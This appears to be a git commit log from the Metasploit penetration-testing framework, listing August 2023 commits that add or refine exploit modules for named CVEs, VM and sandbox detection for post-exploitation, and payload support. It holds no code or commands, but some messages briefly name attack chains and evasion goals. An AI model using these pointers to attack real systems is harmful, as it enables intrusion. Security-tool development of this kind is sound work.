2023-08-22 18:46:25 +02:00
RadioLogic 7d78b52337 Got rid of binary_case variable 2023-08-22 12:46:24 -04:00
RadioLogic ee4a5a01d2 Replaced !invalid.empty? with invalid.any? 2023-08-22 12:44:16 -04:00
RadioLogic 6116fb6a8f Greatly simplified groups null check 2023-08-22 12:41:17 -04:00
RadioLogic 1604cf2134 Removed default value to groups option 2023-08-22 12:40:23 -04:00
RadioLogic c81de292d8 Setting sudomethod option to required
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-08-22 12:28:35 -04:00
RadioLogic 402e25824b Making option only available based on another option
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-08-22 12:26:23 -04:00
RadioLogic 2c63dfa79f Made groups regex safe
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-08-22 12:25:00 -04:00
RadioLogic 737b5a46ed Fixed exist condition with ruby ninjutsu
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-08-22 12:24:06 -04:00
Ron Bowes 4b130f5be7 Change a variable name 2023-08-22 09:00:31 -07:00
jvoisin b79549f178 Use a better detection method for Xen
Based on @adfoster-r7's feedback.
2023-08-22 12:36:48 +02:00
jvoisin 126b5441c9 Add a bunch of virtio modules to detect KVM 2023-08-22 12:34:42 +02:00
jvoisin 995dcfd753 Be a bit more stealthy when looking at kernel modules
No need to run a binary if reading a file is enough
2023-08-22 12:34:42 +02:00
jvoisin bee2b6b381 Add detection via /proc/cpuinfo 2023-08-22 12:34:42 +02:00
jvoisin 2a5595037f Add detection via /sys/devices/virtual/dmi/id/bios_vendor 2023-08-22 12:34:42 +02:00
jvoisin cd1fc1a79c Add another Hyper-V detection 2023-08-22 12:34:42 +02:00
jvoisin 0af4e98eb6 Add some process-based detection 2023-08-22 12:34:42 +02:00
jvoisin 95b964a2f4 Add some more virtualbox kernel modules
Taken from https://www.virtualbox.org/wiki/Guest_resizing
and https://linuxconfig.org/install-virtualbox-guest-additions-on-linux-guest
2023-08-22 12:34:42 +02:00
jvoisin f84cbab0c4 Add some Hyper-v kernel modules
Taken from https://learn.microsoft.com/en-us/windows-server/virtualization/hyper-v/manage/manage-hyper-v-integration-services
2023-08-22 12:34:41 +02:00
jvoisin af22ca9253 Add detection of Xen via /proc/xen/capabilities
Xen's dom0 has `control_d` in its /proc/xen/capabilities
2023-08-22 12:34:41 +02:00
jvoisin 26b6ad2948 Add a comment 2023-08-22 12:34:41 +02:00
jvoisin 4027a6edce Add detection via /sys/class/dmi/id/sys_vendor 2023-08-22 12:34:41 +02:00
Jack Heysel d43bbb6655 rubocop 2023-08-21 19:57:37 -04:00
Jack Heysel 97dd22032c Responded to comments, improved stability 2023-08-21 19:20:25 -04:00
h00die 1bd14dd8f4 error handling for apache modules 2023-08-21 18:12:26 -04:00
h00die 1e79dc582a prometheus lib rewrite 2023-08-21 18:08:21 -04:00
Ron Bowes 1bbf8194ce Remove more unnecessary arguments 2023-08-21 14:45:09 -07:00
Ron Bowes 79fa3dea8b Fix a variable name 2023-08-21 14:32:06 -07:00
Ron Bowes b1c1f705be Remove some unneeded arguments 2023-08-21 14:30:25 -07:00
Ron Bowes 6dd89a513b Make some changes from jvoisin's suggestions in the PR 2023-08-21 14:26:34 -07:00
Ron Bowes f5908a5818 Add a comment 2023-08-21 08:53:52 -07:00
Ron Bowes ce50cfa11a Add module for SonicWall vulns, which includes cve-2023-34124 2023-08-21 08:53:07 -07:00
RadioLogic a024e79b6b Added change to protect groups if its unset 2023-08-21 11:36:16 -04:00
Ismail Dawoodjee e4cf796056 Update documentation with scenarios from latest module code 2023-08-21 10:25:06 +08:00
h00die ceb46cc2ef lib and spec updates 2023-08-20 20:07:42 -04:00
h00die a45792877a lib and spec updates 2023-08-20 19:37:22 -04:00
adfoster-r7 da3ef0a6f9 Ensure datastore network adapter names are consistently resolved 2023-08-21 00:21:37 +01:00
Ismail Dawoodjee fb1a6d3d72 Invert check condition so that extra checks wont run unless version is vulnerable 2023-08-19 21:56:02 +06:30
h00die-gr3y b6cf981378 Updates based on review comments 2023-08-19 08:18:50 +00:00
Ismail Dawoodjee 1188ce1e34 Implement suggestions from code review
* Reduce verbosity of log messages
* Move 'check_*' methods into 'check' method
* Fix non-existent Windows PowerShell Command payload
* Clearer log message for unpausing DAG in 'check_unpaused' method
2023-08-19 09:45:39 +06:30
Ismail Dawoodjee fd3e532b87 Change Airflow version log message to "status" instead of "good"
Co-authored-by: Brendan <bwatters@rapid7.com>
2023-08-19 08:33:31 +06:30
Ismail Dawoodjee b8a2a405c8 Merge branch 'rapid7:master' into apache_airflow_dag_rce 2023-08-19 08:31:18 +06:30
Metasploit 40a3ce6cde automatic module_metadata_base.json update 2023-08-18 16:56:24 -05:00
Jack Heysel 11d7b368da Land #18287, fix stack trace in forge_ticket
This PR fixes a stack trace thrown by the forge_ticket
module when the SPN datastore option was left blank. The module
now fails due to bad-config and gives a detailed error message.
2023-08-18 17:38:51 -04:00
Metasploit f669b4a2af automatic module_metadata_base.json update 2023-08-18 16:32:35 -05:00
Ege Balcı e0f545673c Add files for cleanup, fix serve address, add retry_until_truthy 2023-08-18 23:25:49 +02:00
Jack Heysel f3c8ca94ff Land #18297, fix broken mysql_authbypass_hashdump
This PR fixes the broken mysql_authbypass_hashdump module.
2023-08-18 17:08:31 -04:00
Jack Heysel 5fdc9924d5 Land #18123, add exploit for Jorani unauth RCE
This PR adds a module that chains together a log poisoning LFI,
redirection bypass and a path traversal vulnerability to obtain unauth RCE.
2023-08-18 16:44:42 -04:00
Ege Balcı e97183e7bd Update modules/exploits/linux/http/vmware_vrli_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-08-18 20:21:42 +00:00
Ege Balcı 20ca3b8720 Update modules/exploits/linux/http/vmware_vrli_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-08-18 20:17:37 +00:00
Ege Balcı d8d5049d97 Update modules/exploits/linux/http/vmware_vrli_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-08-18 20:16:32 +00:00
Ege Balcı 4fe15ee788 Update modules/exploits/linux/http/vmware_vrli_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-08-18 20:16:21 +00:00
Ege Balcı 1a97b11f09 Update modules/exploits/linux/http/vmware_vrli_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-08-18 20:16:12 +00:00
Ege Balcı 86c8f11e17 Update modules/exploits/linux/http/vmware_vrli_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-08-18 20:16:03 +00:00
jheysel-r7 0334d28553 Apply final suggestions from code review 2023-08-18 15:40:58 -04:00
jheysel-r7 b064578488 Apply suggestions from code review 2023-08-18 15:37:11 -04:00
jheysel-r7 4ddd789f51 Apply suggestions from code review 2023-08-18 15:33:59 -04:00
dwelch-r7 1878c08293 Land #18276, Add sasl scram 256 auth support to postgres modules 2023-08-18 14:34:51 +01:00
bka-dev c3111d997f major changes - included bindata and added more documentation 2023-08-18 13:45:48 +02:00
adfoster-r7 4a76371b01 Fix broken mysql_authbypass_hashdump module 2023-08-17 23:41:43 +01:00
h00die d84c15cf21 lib and spec updates 2023-08-17 15:29:20 -04:00
Metasploit 8e89a6a3dc Bump version of framework to 6.3.31 2023-08-17 12:05:48 -05:00
Connor Shade a3ab96f2e0 Add fetch payload mention to cmd-injection doc 2023-08-17 11:37:42 -04:00
Metasploit 667ade25aa automatic module_metadata_base.json update 2023-08-17 10:30:45 -05:00
cgranleese-r7 703f535850 Land #18275, Update java reverse http and https to be dynamic 2023-08-17 16:15:16 +01:00
Metasploit 2560fac9c1 automatic module_metadata_base.json update 2023-08-17 09:46:50 -05:00
cgranleese-r7 89f8deb672 Land #18253, Add CVE-2023-34634, Greenshot Fileformat exploit 2023-08-17 15:30:02 +01:00
bwatters 0965233591 Remove debug print 2023-08-17 08:48:42 -05:00
Ismail Dawoodjee 4137d2df21 Merge branch 'rapid7:master' into apache_airflow_dag_rce 2023-08-17 10:19:13 +06:30
Metasploit c748cc4ebb automatic module_metadata_base.json update 2023-08-16 17:01:49 -05:00
Jack Heysel 8717e66b14 Land #18280, Add Maltrail Unauth RCE Module
This PR adds a module for an unauthenticated RCE vulnerability
in Maltrail, a malicious traffic detection system. This vuln
does not have a CVE associated with it.
2023-08-16 17:29:05 -04:00
h00die 97a6fc9549 tables and screen width, ugh 2023-08-16 17:23:31 -04:00
jheysel-r7 cd3d053e6e Update affected versions in the doc file 2023-08-16 16:52:48 -04:00
Ege Balcı a91f928d62 Update documentation/modules/exploit/unix/http/maltrail_rce.md
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-08-16 18:45:37 +00:00
Ege Balcı c3252027f2 Update modules/exploits/unix/http/maltrail_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-08-16 18:45:26 +00:00
Ege Balcı 20d25e46d0 Update modules/exploits/unix/http/maltrail_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-08-16 18:45:12 +00:00
Ismail Dawoodjee a2a4489ce4 Merge branch 'rapid7:master' into apache_airflow_dag_rce 2023-08-16 13:50:13 +06:30
h00die 07d6312781 prometheus stuff 2023-08-15 20:30:54 -04:00
h00die b5a21f66b5 add docs 2023-08-15 20:30:54 -04:00
h00die d75c53fffe prometheus api gather 2023-08-15 20:30:54 -04:00
h00die 7629c7d0f4 prometheus node exporter library 2023-08-15 20:30:54 -04:00
adfoster-r7 33193bdd41 Update java reverse http and https to be dynamic 2023-08-16 00:50:41 +01:00
Metasploit e943d21a52 automatic module_metadata_base.json update 2023-08-15 15:50:36 -05:00
Jack Heysel 900e418796 Land #18226, H2 Web Interface RCE
This PR adds a module to exploit an RCE feature in
the H2 databases Web Interface.
2023-08-15 16:23:09 -04:00
adfoster-r7 5d85e423a7 Land #18289, Fix a typo in the docs 2023-08-15 17:13:37 +01:00
Spencer McIntyre 53bd5bfb0a Fix a typo in the docs 2023-08-15 10:23:28 -04:00
adfoster-r7 9a50e66c50 Land #18278, Use latest version of ruby-mysql from upstream 2023-08-15 14:29:36 +01:00
dwelch-r7 3329ac5357 Land #18288, Add Meterpreter sanity tests to CI 2023-08-15 14:28:55 +01:00
adfoster-r7 68ce65c6c9 Revert "Revert "Add Meterpreter sanity tests to CI"" 2023-08-15 13:24:59 +01:00
Ismail Dawoodjee 13dbb27245 Implement usual version comparison and remove unactionable text 2023-08-15 12:35:08 +06:30
Ismail Dawoodjee bdaaef8d60 Merge branch 'rapid7:master' into apache_airflow_dag_rce 2023-08-15 12:24:06 +06:30
Metasploit 253290d9c4 automatic module_metadata_base.json update 2023-08-14 22:51:23 -05:00
Jack Heysel 6cf136ec3a Land #18263, Add RaspAP Unauth Command Injection
This PR adds an unauthenticated command injection
module for the RaspAP webgui application.
2023-08-14 23:25:23 -04:00
Jack Heysel 99e78a4c00 Update documentaion file 2023-08-14 21:01:10 -04:00
RadioLogic 6a4d3d3854 Changed bad print to warning 2023-08-14 16:20:08 -04:00
Spencer McIntyre 5dee288464 Stream LDAP query results 2023-08-14 16:14:36 -04:00
RadioLogic 6ff0c956b3 Merge branch 'master' into useradd 2023-08-14 16:13:54 -04:00
RadioLogic 5a66693ae1 Added more description to groups error 2023-08-14 16:05:37 -04:00
RadioLogic 2720027468 Added comments to manual groups 2023-08-14 15:52:54 -04:00
Rory McKinley e6d1a20a05 Use ruby-mysql for MySQL login scanner 2023-08-14 21:34:41 +02:00
Rory McKinley d154247c84 Introduce ruby-mysql gem 2023-08-14 21:34:01 +02:00
RadioLogic 4b9243c061 Added validation to check valid groups to add 2023-08-14 15:32:56 -04:00
RadioLogic 0550f44012 replace print status to print line 2023-08-14 15:31:42 -04:00
RadioLogic 6632993bf1 Added gid correction to manual group additions 2023-08-14 14:11:38 -04:00
Spencer McIntyre 7d9abc87b1 Fix a stack trace in forge_ticket when SPN is blank 2023-08-14 10:42:32 -04:00
bka-dev a47ac264ae corrected typo 2023-08-13 22:56:57 +02:00
bka-dev b623684284 added module documentation 2023-08-13 22:35:14 +02:00
Ismail Dawoodjee 93da96e02f Add additional text to check for Airflow login page 2023-08-12 19:29:57 +06:30
Ismail Dawoodjee 60e8e3a487 Remove space before semicolon in payload command 2023-08-12 10:37:38 +06:30
Ismail Dawoodjee bbe8892549 Terminate payload command with a semicolon
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2023-08-12 09:56:00 +06:30
Ismail Dawoodjee 27039c156b Use the whole <a> tag in version check
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2023-08-12 09:41:53 +06:30
Ismail Dawoodjee 4953dad2fc Update scenario code block to use "msf" instead of "rb" - 3rd scenario
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2023-08-12 09:29:29 +06:30
Ismail Dawoodjee 94521e2dc3 Update scenario code block to use "msf" instead of "rb" - 2nd scenario
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2023-08-12 09:29:08 +06:30
Ismail Dawoodjee ac2d2588d9 Update scenario code block to use "msf" instead of "rb"
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2023-08-12 09:28:19 +06:30
Bastian Kanbach 6930605cde Update cve_2023_21554_queuejumper.rb
corrected minor typo
2023-08-12 00:14:51 +02:00
Bastian Kanbach 40272beaf5 Update cve_2023_21554_queuejumper.rb
Splitted the payload up into different headers to improve readability. Documented headers as well
2023-08-12 00:10:59 +02:00
RadioLogic 54fa11c822 Added new UseraddMethod argument 2023-08-11 17:58:57 -04:00
Bastian Kanbach fe948f77c9 Update modules/auxiliary/scanner/msmq/cve_2023_21554_queuejumper.rb
Splitted the line mentioning the two security researchers in two lines

Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2023-08-11 21:27:17 +02:00
Ege Balcı 2edf12d303 Syntax fix 2023-08-11 18:25:36 +02:00
Ege Balcı 0d7591c2fb Update modules/exploits/unix/http/maltrail_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2023-08-11 16:24:38 +00:00
Ege Balcı 63305a8db6 Update modules/exploits/unix/http/maltrail_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2023-08-11 16:24:19 +00:00
Ismail Dawoodjee 26b1317147 Fix "Notes value PatchedVersion must be an array" error 2023-08-11 22:15:41 +06:30
Ismail Dawoodjee 54b0abb318 Apache Airflow 1.10.10 - Example DAG Remote Code Execution (CVE-2020-11978 + CVE-2020-13927) 2023-08-11 21:43:16 +06:30
jvoisin 86c868084c Remove joesandbox and virtualpc 2023-08-11 14:42:51 +02:00
jvoisin 88a5a52c1a Stringy arrays before checking anything
As suggested in https://github.com/rapid7/metasploit-framework/pull/18179#pullrequestreview-1533226875
2023-08-11 14:42:01 +02:00
jvoisin 9b87a9d4f1 Run HyperV check after Parallels
As suggested in https://github.com/rapid7/metasploit-framework/pull/18179#discussion_r1265637311
2023-08-11 14:42:01 +02:00
jvoisin 075a7e9a14 Narrow a virtualbox check 2023-08-11 14:42:01 +02:00
jvoisin 1188256260 Update the Description to add newly detected VM 2023-08-11 14:42:01 +02:00
jvoisin 89dd8ce930 Add some references 2023-08-11 14:42:01 +02:00
jvoisin f439ca4fb7 Fix Multi String value issues
Spotted by @cdelafuente-r7
2023-08-11 14:42:01 +02:00
jvoisin c3b77844cc Improve Qemu detection 2023-08-11 14:42:01 +02:00
jvoisin fd45073d36 Improve Xen detection 2023-08-11 14:42:01 +02:00
jvoisin 9bed3da364 Improve VirtualBox detection 2023-08-11 14:42:01 +02:00
jvoisin 29d9908f22 Improve virtualpc detection 2023-08-11 14:42:01 +02:00
jvoisin fdd212625f Improve VMWare detection 2023-08-11 14:42:01 +02:00
jvoisin 04da17fc7b Add detection for JoeSandbox 2023-08-11 14:42:01 +02:00
jvoisin dec237ce0a Add Parallels detection 2023-08-11 14:42:01 +02:00
cudalac 904e8ba89f roundcube arbitrary file read 2023-08-10 22:45:01 -04:00
Bastian Kanbach cf9976d857 Update cve_2023_21554_queuejumper.rb
Further tidying according to rubocop
2023-08-11 01:38:02 +02:00
Bastian Kanbach 3953322e80 Update cve_2023_21554_queuejumper.rb
Changed according to the linter
2023-08-11 01:27:59 +02:00
bka-dev 6ced21b4a9 Adds module to detect CVE-2023-21554 aka QueueJumper 2023-08-11 00:45:03 +02:00
bka-dev ef8e6f46bc reverting previous change 2023-08-11 00:43:38 +02:00
bka-dev 1e7e39c383 Adds module to detect CVE-2023-21554 aka QueueJumper 2023-08-11 00:34:30 +02:00
Ege Balcı 4b7d98df07 Add Maltrail Unauthenticated RCE exploit 2023-08-10 23:02:20 +02:00
Metasploit 020320922d Bump version of framework to 6.3.30 2023-08-10 13:33:02 -05:00
adfoster-r7 3dc229f5a1 Land #18279, Revert Add Meterpreter sanity tests to CI 2023-08-10 19:22:04 +01:00
adfoster-r7 cdbd591f07 Revert "Add Meterpreter sanity tests to CI" 2023-08-10 19:08:09 +01:00
Connor Shade 59bdd0d430 add docs for cmn-injection-module 2023-08-10 07:13:43 -04:00
Ege Balcı e74a68b3fb Make rubocop happy 2023-08-10 10:10:02 +02:00
Ege Balcı 634713ee56 Fix check method and integrate CmdStager 2023-08-10 00:56:44 +02:00
Ege Balcı da9200819d Update scenarios for new targets 2023-08-10 00:55:52 +02:00
Ege Balcı 85f8333b15 Update modules/exploits/unix/http/raspap_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-08-09 21:27:25 +00:00
Ege Balcı 54ccfc1b8c Update modules/exploits/unix/http/raspap_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-08-09 21:26:49 +00:00
Ege Balcı a8a7b4eaeb Update modules/exploits/unix/http/raspap_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-08-09 21:24:38 +00:00
Ege Balcı fade54dc4d Update modules/exploits/unix/http/raspap_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-08-09 21:24:24 +00:00
Ege Balcı 2c8d6b97fe Update modules/exploits/unix/http/raspap_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-08-09 21:24:08 +00:00
adfoster-r7 98ac76d54f Add sasl scram 256 auth support to postgres modules 2023-08-09 16:41:01 +01:00
Metasploit 0a26ac2e5b automatic module_metadata_base.json update 2023-08-09 03:59:19 -05:00
cgranleese-r7 214c788ce7 Land #18232, metabase setup token rce (cve-2023-38646) 2023-08-09 09:44:53 +01:00
Metasploit c821d39bdb automatic module_metadata_base.json update 2023-08-09 03:41:32 -05:00
adfoster-r7 c4ed903da9 Land #18274, Update CVE-2020-14871 docs 2023-08-09 09:27:00 +01:00
wvu 3be876b9dc Update pam_username_bof.md 2023-08-09 00:24:53 -05:00
wvu 03c99660db Update pam_username_bof.rb 2023-08-09 00:22:57 -05:00
h00die f125ad8870 review comments 2023-08-08 17:44:35 -04:00
h00die bba8681be4 update doc 2023-08-08 17:44:35 -04:00
h00die 7b024f21bd apache nifi h2 rce 2023-08-08 17:44:35 -04:00
h00die 5cdac38ac0 apache nifi h2 rce 2023-08-08 17:44:35 -04:00
h00die e8ce0454cd review comments 2023-08-08 17:16:57 -04:00
h00die dca125963c metabase review comments 2023-08-08 17:16:57 -04:00
h00die f30c996340 remove comment 2023-08-08 17:16:56 -04:00
h00die 9516592eb6 metabase setup token rce 2023-08-08 17:16:56 -04:00
h00die 7ceeb9f8de review comments 2023-08-08 17:15:22 -04:00
h00die 67ea97d686 set right port 2023-08-08 17:15:22 -04:00
h00die 06a4433e2a review comments 2023-08-08 17:15:22 -04:00
h00die ec5317a789 h2 doc addition 2023-08-08 17:15:22 -04:00
h00die 97daf47269 h2 web interface shell 2023-08-08 17:15:22 -04:00
Ege Balcı 340e4c0117 Make rubocop happy 2023-08-08 20:54:40 +02:00
Ege Balcı 169ce82ea7 Update modules/exploits/unix/http/raspap_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2023-08-08 18:37:23 +00:00
Ege Balcı 7217eda1eb Update modules/exploits/unix/http/raspap_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2023-08-08 18:37:15 +00:00
Ege Balcı 95bb5a1e09 Update modules/exploits/unix/http/raspap_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2023-08-08 18:37:08 +00:00
Ege Balcı d1f9f540c6 Add VMware vRealize Log Insight RCE exploit 2023-08-08 20:32:38 +02:00
Metasploit 940496362c automatic module_metadata_base.json update 2023-08-08 12:47:51 -05:00
Jack Heysel 6e8d0b33df Land #18191, Improve post linux checkcontainer
This PR adds support for detecting whether a session is
running in a podman container and improves detection for
sessions running in Docker, LXC and WLS containers.
2023-08-08 13:26:01 -04:00
Metasploit a5cdbcaf20 automatic module_metadata_base.json update 2023-08-08 09:01:23 -05:00
sfewer-r7 85ab3113c2 bug fix for issue 18237. ColdFusion configured with a Development profile behaves slightly differently than ColdFusion deployed in a Production profile, so we need to test for some different return values during exploitation. 2023-08-08 14:47:14 +01:00
adfoster-r7 814198dc66 Land #18264, Add 12.1 Targets for CVE-2023-3519 2023-08-08 14:37:44 +01:00
Spencer McIntyre baa0f3d5e3 Switch the fingerprint resource for v12 compat
Switching to use citrix-fonts.css allows the technique to work for 12.x
and 13.x.
2023-08-08 08:57:17 -04:00
Spencer McIntyre 72092392e9 Fix check method for v12, add automatic targeting 2023-08-08 08:57:11 -04:00
Ege Balcı 2abd826291 Update side effects and options 2023-08-08 00:44:19 +02:00
Ege Balcı 3b7653c08e Update modules/exploits/unix/http/raspap_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2023-08-07 22:30:51 +00:00
Ege Balcı 79e009a03f Update modules/exploits/unix/http/raspap_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2023-08-07 22:30:25 +00:00
Ege Balcı 6225df80e9 Update modules/exploits/unix/http/raspap_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2023-08-07 22:23:15 +00:00
bwatters d0e0f77624 Add license for pup pic 2023-08-07 12:36:20 -05:00
Pearce Barry 765ff28ff9 Improve tab completion for set command.
Also minor improvement for tab completion with the `unset` command.

Fixes #18217.
2023-08-06 18:32:27 -05:00
Spencer McIntyre 760bc3fbfb Add a target for 12.1-64.17 2023-08-04 16:21:21 -04:00
Ege Balcı 41f0c30855 Add RaspAP Unauthenticated Command Injection (CVE-2022-39986) Exploit 2023-08-04 21:22:07 +02:00
Spencer McIntyre c3324ab002 Add a target for 12.1-65.25 2023-08-04 15:14:24 -04:00
Jack Heysel bcfc892195 General code clean up 2023-08-04 14:27:14 -04:00
bwatters 2f9e5cd332 Update info hash 2023-08-04 11:16:38 -05:00
dwelch-r7 9e7960fd9f Land #18224, First iteration of specs for SSH Login scanner 2023-08-04 16:22:37 +01:00
cgranleese-r7 6dc7ba112e Makes some adjustments to the favorites command 2023-08-04 15:33:35 +01:00
cgranleese-r7 45c9ce86f4 Land #18231, fix for issue #18219, allow index selection for favorites 2023-08-04 15:08:37 +01:00
cgranleese-r7 897d5d1753 Land #18260, Update aws instance connect EC2_ID validation 2023-08-04 14:41:18 +01:00
adfoster-r7 a3d129fe9f Land #18244, Update payload size warnings to errors on CI 2023-08-04 14:10:14 +01:00
adfoster-r7 61a4974670 Update aws instance connect EC2_ID validation 2023-08-04 14:02:06 +01:00
cgranleese-r7 dfe030cc99 Update payload size warnings to errors on CI 2023-08-04 13:56:31 +01:00
dwelch-r7 6f7ebb3824 Land #18210, Add Meterpreter sanity tests to CI 2023-08-04 13:24:39 +01:00
adfoster-r7 a543199ee3 Land #18220, Add error handling when loading payloads 2023-08-04 12:07:39 +01:00
adfoster-r7 b1d6983fad Land #18228, Adds Rubocop rule to detect invalid pack/unpack directives 2023-08-04 11:20:18 +01:00
bwatters e8456a6625 Add documentation and fix null filename catch 2023-08-03 18:30:20 -05:00
Metasploit 4ebf4fd52e Bump version of framework to 6.3.29 2023-08-03 17:39:55 -05:00
Jeffrey Martin a8583438c1 fix nokogiri version out of sync in lock file 2023-08-03 17:31:01 -05:00
Metasploit 6c6a553284 automatic module_metadata_base.json update 2023-08-03 14:46:55 -05:00
Jeffrey Martin 5a3a08ca2a Land #18255, Remove python2 from docker setup 2023-08-03 14:24:27 -05:00
adfoster-r7 756d746abe Remove python2 from docker setup 2023-08-03 20:20:13 +01:00
Spencer McIntyre ab2b1b731d Land #18254, remove double refs in Gemfile.lock
remove double reference in Gemfile.lock
2023-08-03 14:47:15 -04:00
Jeffrey Martin 776b4918a7 remove double reference in Gemfile.lock
merge introduced double entries for aws-sdk-ec2instanceconnect
2023-08-03 13:44:07 -05:00
Spencer McIntyre e3d4a8ccd9 Land #18234, Fix for issue #13724
Fix for issue #13724: fix crash for unloaded user32.dll: add library loading
2023-08-03 14:32:33 -04:00
bwatters d3b7bcd676 Working 2023-08-03 13:23:41 -05:00
Metasploit bd36c80a2a automatic module_metadata_base.json update 2023-08-03 12:27:01 -05:00
Christophe De La Fuente 4a7836055e Land #18211, Subrion CMS v4.2.1 RCE 2023-08-03 19:03:44 +02:00
Christophe De La Fuente 00006fffae Land #18240, Citrix RCE - CVE-2023-3519 2023-08-03 18:55:48 +02:00
Spencer McIntyre 67e1c57b7c Fix some buffer encoding issues 2023-08-03 12:47:14 -04:00
cgranleese-r7 61f70e09f6 detect invalid Pack/Unpack directives 2023-08-03 17:39:21 +01:00
Metasploit 7fee5a0761 automatic module_metadata_base.json update 2023-08-03 11:31:10 -05:00
adfoster-r7 9a3d068c17 Add apt-get install options for y and no-install-recommends 2023-08-03 17:12:00 +01:00
adfoster-r7 d8dc189168 Add Meterpreter sanity tests to CI 2023-08-03 17:11:44 +01:00
Spencer McIntyre 39382c4652 Land #17600, Add AWS Instance Connect Sessions
Implement AWS Instance Connect Sessions
2023-08-03 12:06:29 -04:00
bwatters 59e3760509 First attempt at CVE-2023-34634 2023-08-03 10:58:07 -05:00
cgranleese-r7 5756241fb3 Land #18223, Fix broken msfconsole histories when switching between shell sessions 2023-08-03 16:40:01 +01:00
Spencer McIntyre 034fcdde59 Drop the logic to filter repeated error messages 2023-08-03 10:51:58 -04:00
Ismail Dawoodjee 74e886dd68 Merge branch 'rapid7:master' into subrion_cms_file_upload_rce 2023-08-03 20:58:22 +06:30
D00Movenok 3ea9c0100b fixed windows/x64/messagebox CachedSize 2023-08-03 17:10:11 +03:00
Metasploit 4360821d38 automatic module_metadata_base.json update 2023-08-03 07:15:27 -05:00
Ismail Dawoodjee 31da1f890d Merge branch 'rapid7:master' into subrion_cms_file_upload_rce 2023-08-03 18:29:21 +06:30
cgranleese-r7 49c5b1df64 Land #18203, Fix libssh_auth_bypass crash on newer versions of Ruby 2023-08-03 12:51:36 +01:00
cgranleese-r7 b44c08e5f1 Land #18248, Fix bootsnap warning when booting msfrpc service 2023-08-03 12:46:15 +01:00
cgranleese-r7 265cec01ae Land #18249, Give better error messages when failing to load mettle extensions 2023-08-03 12:40:03 +01:00
Ismail Dawoodjee 1c075f659c Merge branch 'rapid7:master' into subrion_cms_file_upload_rce 2023-08-03 10:16:07 +06:30
Jack Heysel 30b824d8ab external sources 2023-08-02 19:33:25 -04:00
Jack Heysel 29c2361a9c Module clean up, docs, metadata, rubocop 2023-08-02 18:53:20 -04:00
adfoster-r7 a643fa517a Give better error messages when failing to load mettle extensions 2023-08-02 23:03:27 +01:00
Spencer McIntyre 930c90c3ac Update all targets so the stack can be relocated 2023-08-02 14:49:04 -04:00
Metasploit 1943892aef automatic module_metadata_base.json update 2023-08-02 13:02:12 -05:00
Spencer McIntyre b365ab7d10 Add a target for 13.1-37.38 2023-08-02 13:57:53 -04:00
adfoster-r7 9a40e2612b Land #17129, Add OSX Aarch64 Payload support 2023-08-02 18:37:56 +01:00
Spencer McIntyre 5d0b6e1fbc Add a target for 13.0-91.12 2023-08-02 12:48:34 -04:00
adfoster-r7 67770d5684 Fix bootsnap warning when booting msfrpc service 2023-08-02 17:35:11 +01:00
Ege Balcı 329920eeb2 Add Netgear NMS RCE (CVE-2023-38096/8) exploit 2023-08-02 18:03:57 +02:00
ismaildawoodjee 19dcc2d674 Move module and documentation from linux/http to multi/http 2023-08-02 10:10:27 -04:00
Ismail Dawoodjee 888091dfe4 Merge branch 'rapid7:master' into subrion_cms_file_upload_rce 2023-08-02 20:21:31 +06:30
usiegl00 dd7b50d292 Merge pull request #1 from adfoster-r7/update-osx-templates-makefile-and-compile-binaries
Update osx templates makefile and compile binaries
2023-08-01 19:09:19 -07:00
adfoster-r7 89cd524acb Update osx templates makefile and compile binaries 2023-08-02 01:26:18 +01:00
RadioLogic 5d0ea40212 Replaced if statement with clean case 2023-08-01 19:51:19 -04:00
RadioLogic c361dd9bdf Removed condition that never occurs 2023-08-01 19:48:49 -04:00
h00die 042136cf57 python flask signer module and docs 2023-08-01 18:27:25 -04:00
RadioLogic 594fea60ba Update modules/post/linux/manage/adduser.rb
Made some safety checks easier to read

Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-08-01 15:29:08 -04:00
RageLtMan f0c853073e Address most of @adfoster-r7's 202307 review 2023-08-01 15:04:58 -04:00
Jeffrey Martin 5c67f3231b add aws-sdk-ec2instanceconnect gem 2023-08-01 15:04:58 -04:00
